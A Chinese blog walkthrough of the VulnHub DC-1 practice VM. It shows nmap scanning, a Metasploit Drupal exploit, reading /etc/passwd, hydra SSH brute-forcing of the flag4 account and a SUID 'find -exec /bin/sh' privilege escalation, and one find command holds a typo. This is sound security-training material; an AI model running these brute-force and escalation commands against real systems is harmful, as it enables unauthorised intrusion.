VulnHub系列(一)DC-1

最新推荐文章于 2024-07-31 00:00:00 发布
最新推荐文章于 2024-07-31 00:00:00 发布
阅读量3.3k 收藏
点赞数 1
文章标签: 网络 linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45809480/article/details/125656872
版权

环境
kali linux 和 DC-1 都是搭建在VMware上的虚拟机,都是NAT模式。

主机发现

NAT模式下虚拟机没有被分配真实的ip地址,他们通过共享宿主机的ip地址访问互联网。我们可以通过它的MAC地址00:0C:29:23:E2:8D查到宿主机分配给他的虚拟ip。

arp-scan -l=>192.168.62.134

image

还有另一种方法,假设我们已经和目标在同一个局域网下:

ip addr

image

查到当前所在网段 192.168.62.135\24

前24位为网络号(192.168.62),最后8位是主机号(135)

nmap -sP 192.168.62.0/24

image

扫描主机

nmap -sV -p- 192.168.62.134

-sV 主机安装的软件版本
-p- 扫描0~65535范围端口

image

可看到80端口开启,我们在浏览器访问

信息收集

image
我们看到网站用的是Drupal 7一款WebApp,挺牛的由很多web专家一起开发维护的。

Wappalyzer是网站指纹工具,可在火狐插件中安装。

Metasploit 搜索漏洞

search drupal

image

选择漏洞,并查看需要配置的参数

use 4

show options

image

set rhost 192.168.62.134

run

出现meterpreter说明攻击成功,shell可获得终端

Get Shell

shell

image

cat flag1.txt

image
没什么用...

查看passwd文件中记录的用户信息

cat /etc/passwd

image

image
1 用户名
2 密码(x表示密码被加密存储在 /etc/shadow 文件中)
3 用户id(0 :root, 1~99:其他用户, 100~999系统保留)
4 用户组id (保存在 /etc/group 文件中)
5 备注
6 用户登录时所在的绝对路径
7 命令路径

cat /etc/passwd发现没有权限访问,如果可的话,就能使用John the Ripper来破解密码啦

flag4这个用户名一听就很有前途哈哈。。

hydra + john 暴力破解

john
John The Ripper 是一个(离线)密码破解工具,常用于执行字典攻击。它的密码字典是一个“单词列表”。它还可以把密码用加密算法或秘钥加密,再把输出与加密串比较进而破解面。Hydra
THC Hydra 是一个(在线)网络登录黑客工具,它使用字典或暴力破解来尝试登录。它支持特别多的协议如 邮件(POP3,IMAP)、数据库、LDAP、SMB、VNC、SSH。

hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.62.134

-l 指定用户名
-P 密码字典(这里使用的是john安装后自带的,kali中在/usr/share/john目录下)
-ssh://ip 指定使用的协议和ip

image

破解成功,密码orange

ssh username@ip

image

flag4不是最终的flag, 最终的flag在root目录下。

image

提权

如何拥有root权限:1.root用户登录
再来一次爆破...
hydra -l root -P /usr/share/john/password.lst ssh://192.168.62.134
失败...2.普通用户登录
利用有suid权限位的命令获得权限

suid权限位:可以以root权限执行命令

find / -type f -perm -u=s 2>/dev/null

image

发现 find 命令被设置为了suid权限

-exec实现两个命令的连接

find / -type -f -name test -exec "whoami" \; find / -type -f -name test -exec "/bin/sh" \;
(test 是我事先创建的)

image

参考

Vulnhub靶机渗透测试实战10种常见黑客工具介绍

JFLEARN
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vulnhub靶机DC系列-DC-3.2
m0_54525483的博客
12-31 1149
Vulnhub靶机DC系列-DC-3.2 靶场名称:DC-2 下载地址: DC-3-2.zip (Size: 1005 MB) Download: http://www.five86.com/downloads/DC-3-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent ( Ma
Vulnhub靶机DC系列-DC-7
m0_54525483的博客
01-07 1373
Vulnhub靶机DC系列-DC-7 靶场名称:DC-7 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ 下载地址: ** DC-7.zip (Size: 939 MB) Download: http://www.five86.com/downloads/DC-7.zip Download (Mirror): https://download.vulnhub.com/dc/DC-7.zip Download (Torrent): https://download.v
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 178
DC-1详解
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4084
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
渗透测试学习之vulnhub系列靶机——DC1
jingzhou_666的博客
06-09 1776
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 729
Vulnhub靶机:DC-1渗透详细过程
vulnhub靶场实战系列-DC-2实战
weixin_45221204的博客
05-18 1317
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行,本文使用VMware测试,每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和获得flag。WordPress CMS的信息搜集与利用,获得flag,根据提示进一步操作使用cewl获得目标上存在的用户信息,获得密码字典使用wpscan进行WordPress网站用户名爆破,生成用户字典使用wpscan进一步爆破获得可用的密码和用户。
VulnHub系列』DC-1靶机渗透测试
qq_45300786的博客
11-29 391
0x00 前言 在开始之前我们需要知道的是, 靶机的ip获取方式是dhcp服务器来分配ip的,如果dhcp没有自动分配ip的话,请看我的置顶文章,解决没有ip的问题 而我的VMware就只有NAT模式可以使用dhcp服务器 那么接下来都将是NAT模式 工具、知识点和漏洞 nmap metasploit mysql 网站配置 hydra find命令 suid提权 配置环境 kali: 192.168.100.34 靶机DC-1: 192.168
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4474
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶场之DC-2
qq_58091216的博客
01-07 1016
1)我们使用ssh登录账号,用jerry登录半天登录不上去,我们使用tom进行登录,发现可以登录成功,而且看到了flag3.txt。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权。虚拟机开启之后界面如下(和1一样),我们不知道ip,需要自己探活,网段知道:192.168.52.0/24。与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。添加完成之后,再次访问,访问成功(我们使用kali里面的浏览器)
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1137
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub系列』DC- 1-Walkthrough.pdf
10-30
VulnHub系列』DC: 1-Walkthrough,内附工具、知识点和漏洞靶场地址。图文并茂
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 372
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 415
计算机网络—三种交换方式图文详解
S5730举例
jjjxxxhhh123的博客
07-27 972
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JFLEARN

CSDN这么拉会有人打赏?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值